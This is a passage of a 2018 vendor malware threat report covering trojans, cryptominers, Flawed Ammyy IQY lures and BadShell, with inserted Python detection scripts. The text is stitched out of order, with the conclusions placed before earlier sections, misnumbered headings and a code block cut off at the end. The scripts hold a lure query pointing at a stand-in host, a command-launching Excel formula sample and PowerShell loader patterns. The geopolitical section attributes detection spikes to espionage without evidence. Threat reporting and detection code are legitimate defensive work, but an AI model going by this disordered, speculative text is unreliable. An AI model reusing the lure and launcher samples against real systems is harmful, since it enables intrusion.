And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in only one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but it now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Furthermore, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


73 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


74 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
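The "well over ten times the usual number of detections" spike described here is the kind of anomaly the report's per-country timelines are meant to surface. The Python below is an added example, not Comodo's code or telemetry: it buckets constructed detection records by ccTLD and day, uses each country's median daily count as a baseline, flags days above a configurable multiple of it, and totals detections per country the way a bubble chart would.

```python
"""Spike finder for daily malware-detection timelines (added example).

The records are constructed for illustration and are not Comodo data.
Each log line has the form "YYYY-MM-DD,ccTLD,malware_type".
"""
from collections import Counter, defaultdict
from datetime import date, timedelta
from statistics import median


def _constructed_log() -> str:
    """Build a small constructed log: a quiet 'kp' series with one spike day
    (and one day with no detections), plus a steady 'de' series that a
    spike detector must not flag."""
    lines = []
    kp_per_day = {"2018-05-01": 2, "2018-05-02": 1, "2018-05-03": 25,
                  "2018-05-04": 2, "2018-05-06": 1, "2018-05-07": 2}
    for day, n in kp_per_day.items():
        lines.extend([f"{day},kp,Trojan"] * n)
    for d in range(1, 8):  # 30 detections on each of seven days
        lines.extend([f"2018-05-{d:02d},de,Worm"] * 30)
    return "\n".join(lines)


SAMPLE_LOG = _constructed_log()


def parse_records(text: str) -> list:
    """Parse 'date,cc,type' lines into (date, cc, type) tuples, skipping
    blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 3:
            continue
        records.append((date.fromisoformat(parts[0]), parts[1], parts[2]))
    return records


def daily_counts(records: list) -> dict:
    """Per-ccTLD daily counts with every day of the observed range present,
    so that days with zero detections still pull the baseline down."""
    raw = defaultdict(Counter)
    for day, cc, _ in records:
        raw[cc][day] += 1
    series_by_cc = {}
    for cc, counter in raw.items():
        first, last = min(counter), max(counter)
        series, day = {}, first
        while day <= last:
            series[day] = counter.get(day, 0)
            day += timedelta(days=1)
        series_by_cc[cc] = series
    return series_by_cc


def find_spikes(series_by_cc: dict, factor: float = 10.0,
                min_count: int = 5) -> list:
    """Flag days whose count is at least `factor` times the country's median
    daily count and at least `min_count` (so a near-zero baseline does not
    flag every stray detection). Returns (cc, day, count, baseline)."""
    spikes = []
    for cc, series in series_by_cc.items():
        baseline = median(series.values())
        threshold = max(min_count, factor * baseline)
        for day, n in sorted(series.items()):
            if n >= threshold:
                spikes.append((cc, day.isoformat(), n, baseline))
    return spikes


def top_countries(records: list, n: int = 3) -> list:
    """Total detections per ccTLD, the figure a bubble chart would plot."""
    return Counter(cc for _, cc, _ in records).most_common(n)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for cc, day, n, base in find_spikes(daily_counts(recs)):
        print(f"{cc}: {day} had {n} detections against a median of {base}")
    print("top countries:", top_countries(recs))
```

On the constructed log only the kp series is flagged (25 detections on 2018-05-03 against a median of 2), while the steady de series, despite far more detections in total, produces no spike.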


75 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


76 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


77 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


79 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 13 of 73

As you can see in the diagram, Ammyy Admin was used to spread many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of Ammyy Admin version 3, on which it is built. Flawed Ammyy RAT gives attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is that this trick, too, is based on legitimate software, this time Microsoft Excel.


Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY (Internet Query) files are Excel Web Query definitions: a small text file holding a URL and a few related parameters. When the file is opened, Excel asks to fetch the URL and places whatever the server returns into the worksheet, so an attacker who controls that URL controls what Excel loads and, if the returned content is a formula and the user accepts Excel's security prompts, what it executes.

The malicious IQY file points at an attacker-controlled URL, which kicks off a chain of malicious files that ends with Flawed Ammyy being downloaded and run via Windows PowerShell.

Malware runs PowerShell
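The following Python script is an added example (it is not from the Comodo report and is not Comodo's code) showing how a mail gateway or an analyst can triage an IQY attachment before anyone opens it in Excel. It parses the Web Query format described above, flags a query that points at a plain-HTTP URL, an IP literal, a host outside an assumed allowlist, or a path with a non-spreadsheet extension, and separately checks whether fetched content looks like a command-launching formula rather than tabular data. The sample IQY files, the allowlist and the TEST-NET address 203.0.113.5 are constructed for the example; the `=cmd|` formula pattern is one common form of the returned-content step, which the report itself does not show.

```python
"""Triage Excel Web Query (.iqy) attachments before Excel ever opens them.

Added example, not code from the Comodo report. The allowlist, the sample
files and the TEST-NET address 203.0.113.5 below are constructed.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Hosts an organisation actually expects Excel to pull data from (assumed).
ALLOWED_HOSTS = {"intranet.example.com", "reports.example.com"}

# Extensions that make no sense for a spreadsheet data source.
SUSPICIOUS_EXT = (".dat", ".exe", ".ps1", ".bat", ".cmd", ".hta", ".vbs", ".js", ".txt")

# Formula that would make Excel launch an external program once the user clicks
# through the security prompts. One common form of the "returned content runs a
# command" step (assumed; the report shows only the resulting PowerShell).
LAUNCHER_FORMULA = re.compile(r"^\s*=\s*(?:cmd|msexcel|powershell|mshta)\s*\|", re.I | re.M)


def parse_iqy(text):
    """Split an IQY file into (url, post_data, options).

    Layout: line 1 'WEB', line 2 version, line 3 URL, line 4 POST data
    (blank for a GET), remaining lines Key=Value query options.
    """
    lines = text.replace("\r\n", "\n").split("\n")
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        raise ValueError("not an Excel WEB query")
    url = lines[2].strip()
    post = lines[3].strip() if len(lines) > 3 else ""
    options = {}
    for line in lines[4:]:
        if "=" in line:
            key, value = line.split("=", 1)
            options[key.strip()] = value.strip()
    return url, post, options


def triage_iqy(text, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings; an empty list means nothing looked wrong."""
    url, _post, _options = parse_iqy(text)
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    findings = []
    if parsed.scheme != "https":
        findings.append("scheme:%s" % (parsed.scheme or "none"))
    try:
        ipaddress.ip_address(host)
        findings.append("host-is-ip-literal")
    except ValueError:
        pass
    if host not in allowed_hosts:
        findings.append("host-not-allowlisted:%s" % host)
    if parsed.path.lower().endswith(SUSPICIOUS_EXT):
        findings.append("suspicious-extension:%s" % parsed.path.rsplit(".", 1)[-1].lower())
    return findings


def fetched_content_is_launcher(content):
    """True when what the server returned would be executed rather than tabulated."""
    return bool(LAUNCHER_FORMULA.search(content))


# Constructed samples: a legitimate report query and a lure shaped like the
# Flawed Ammyy one (a short file whose only job is to point Excel at a URL).
BENIGN_IQY = "WEB\n1\nhttps://reports.example.com/sales.html\n\nSelection=AllTables\nFormatting=None\n"
LURE_IQY = "WEB\n1\nhttp://203.0.113.5/1.dat\n\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("lure", LURE_IQY)):
        print(name, triage_iqy(sample) or "clean")
    print("launcher:", fetched_content_is_launcher("=cmd|' /c calc.exe'!A0"))
```

The allowlist is the control that matters: a legitimate business IQY points at a known internal reporting host over HTTPS, whereas a lure points at a host the organisation has never queried, so "host-not-allowlisted" alone is enough to quarantine the attachment for review.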


Thus, in this case, machines face extremely dangerous and potent malware that is both built on legitimate software (Ammyy Admin) and delivered through legitimate software (Excel and PowerShell). This makes the attack much harder for antivirus software to detect.

2.4 The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably entail a shift of attack vectors toward covert theft and the manipulation of users. It is a real gift for cybercriminals and a nightmare for users.

Trojans let attackers gain time. Because the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases the attack is only discovered when it is too late: after money has been withdrawn from a bank account, after confidential data has been published, and so on. The pairing of trojans as payloads with phishing emails as the means of delivery, observed throughout Q2, will result in a large surge in such attacks and in victims. And using legitimate tools like PowerShell to run the malware will amplify the number of victims even more, because such attacks are much harder for antivirus products to detect.

To fight these attacks, cybersecurity departments need to rearrange their security measures according to the trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles offers the most promising solution.

The growth of Flawed Ammyy attacks for Q2 (chart): April 43,188; May 46,382; June 48,881.


3 Cryptominer Evolution: Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining new, dangerous abilities.

Earlier cryptominers were only able to use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: a cryptominer would not steal information or destroy data like other malware, merely suck up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has changed radically.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mining alone requires. These samples clearly show that cryptominers are turning into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight back against antimalware tools: they camouflage themselves, kill competing cryptominers, and even crash the user's system if an attempt is made to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as its name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine as a file but operates only in memory, which makes it much harder for antivirus products to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of the infection. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.


Comodo analysts found that the malware was a cryptominer that relied on legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

Decoding the PowerShell arguments reveals where the malicious code sits in the registry. The PowerShell script reads it from there and injects it into an existing running process.

BadShell at work


The malicious code in the registry
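Given a scheduled task whose action is a PowerShell command line, the first thing a responder needs to know is what the encoded argument actually does. The Python below is an added example (it is not from the report and not Comodo's tooling) that decodes a `-EncodedCommand` argument (base64 of UTF-16LE text) and then searches the result for the building blocks the report describes: a registry read, a base64 decode, Invoke-Expression, a hidden window and memory-injection APIs. The task command line and the registry path `HKCU:\Software\Classes\AppX\Dummy` are constructed for the example and carry no real payload.

```python
"""Decode and triage a PowerShell command line taken from a scheduled task.

Added example, not the report's or Comodo's code. The sample task command and
the registry path it reads are constructed; the blob it decodes is inert.
"""
import base64
import re

# -e / -enc / -EncodedCommand ... (longest alternatives first so 'enc' is not cut to 'e')
ENCODED_ARG = re.compile(
    r"-(?:encodedcommand|encode|encod|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Registry value reads of the form Get-ItemProperty [-Path] 'HKxx:\...' or HKEY_...
REGISTRY_READ = re.compile(
    r"Get-ItemProperty(?:Value)?\s+(?:-Path\s+)?['\"]?((?:HK[A-Z]{2}|HKEY_[A-Z_]+)[^'\" ]+)", re.I)

INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "registry-read": REGISTRY_READ,
    "memory-injection-api": re.compile(
        r"\b(?:VirtualAlloc(?:Ex)?|WriteProcessMemory|CreateRemoteThread|NtCreateThreadEx)\b", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return the script hidden in -EncodedCommand, or None if there is none."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-16-le")


def triage_powershell(cmdline):
    """Decode the command line and report which suspicious building blocks it uses."""
    script = decode_encoded_command(cmdline)
    # Search the visible switches plus the decoded script, with the opaque blob removed
    # so its base64 characters cannot trigger a word-level match by accident.
    haystack = ENCODED_ARG.sub("-EncodedCommand <decoded>", cmdline)
    if script is not None:
        haystack += "\n" + script
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {
        "script": script,
        "indicators": hits,
        "registry_paths": REGISTRY_READ.findall(haystack),
    }


# Constructed stand-in for a BadShell-style task action: read a registry value,
# base64-decode it and hand the text to Invoke-Expression. The value is not real.
SAMPLE_SCRIPT = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Classes\\AppX\\Dummy' -Name Data).Data; "
    "iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)))"
)


def build_sample_cmdline():
    """Encode SAMPLE_SCRIPT the way PowerShell expects it (UTF-16LE, then base64)."""
    encoded = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -NoP -NonI -W Hidden -Enc " + encoded


if __name__ == "__main__":
    result = triage_powershell(build_sample_cmdline())
    print("indicators:", ", ".join(result["indicators"]))
    print("registry paths:", result["registry_paths"])
    print("decoded:", result["script"])
```

In practice the input is the Command and Arguments of each task exported with `schtasks /Query /XML`; a task that combines a registry read, a base64 decode and Invoke-Expression under a hidden window is the BadShell pattern, and the extracted registry path tells you where to collect the payload before cleaning.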


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took charge of the situation and cleaned the infection from all affected computers, but the company's financial losses were, of course, irreversible.

Invulnerability to antivirus software and persistence in the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it earns for the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique, one that turns the infected machine into the attacker's slave.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes unremovable. Attempting to kill it kills the target system along with it.

The secret of WinstarNssmMiner's persistence lies in the way it infects a victim's computer. It consists of two components injected into two svchost.exe system processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes carry the "critical process" attribute, which means that terminating either of them crashes the system and leaves the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only the victims' system but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, its processes are terminated.

CoinMiner kills its rivals as follows

The code below downloads the CoinMiner build for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include the process names of other cryptominers.

In this way CoinMiner has the victim's computer to itself and uses its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into a web page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily spotted in the page source.

The CoinHive script

After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter, perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage the CoinHive presence behind URL shorteners.


As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we find an iframe:

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make it as invisible as possible.

Now let's look at the URL https://cnhv.co (Coinhive's own link-shortener service).

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's source but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive keeps co-opting her computer to mine cryptocoins.

The next piece of malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour the infected machine's resources but instead steals cryptocurrency outright by redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals treat this copy-and-paste step as a weak point they can exploit.

The cryptocurrency clipboard hijacker watches the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control, so the unaware owner of the infected machine delivers the cryptocoins straight into the cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

The user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack
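The practitioner's caveat here is that the substituted address is itself well-formed: a hijacker has to plant a valid address or the wallet software would reject it, so checksum validation alone cannot catch the swap. The only robust check compares what the user actually copied with what the clipboard holds at paste time. The Python below is an added example (not from the report and not Comodo's code) that implements Base58Check encoding and decoding to validate legacy Bitcoin addresses, recognises the address shapes a hijacker pattern-matches (it goes slightly beyond the report by also covering Ethereum-style 0x addresses), and returns a verdict for a copied/pasted pair. The two addresses from the report are used only as sample input, and the all-zero hash160 address is a constructed test vector.

```python
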